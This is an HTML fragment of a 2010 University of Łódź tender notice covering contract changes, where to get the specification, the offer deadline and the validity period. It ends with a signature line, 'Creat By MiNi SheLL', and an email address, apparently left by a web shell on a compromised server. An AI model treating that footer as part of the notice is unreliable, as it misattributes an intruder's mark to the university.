<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Łódzki Biuro Inwestycji i Nieruchomości ul. Lindleya 3,pok.226 90-131 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 09:30, miejsce: Uniwersytet Łódzki Biuro Inwestycji i Nieruchomości ul. Lindleya 3,pok.226 90-131 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com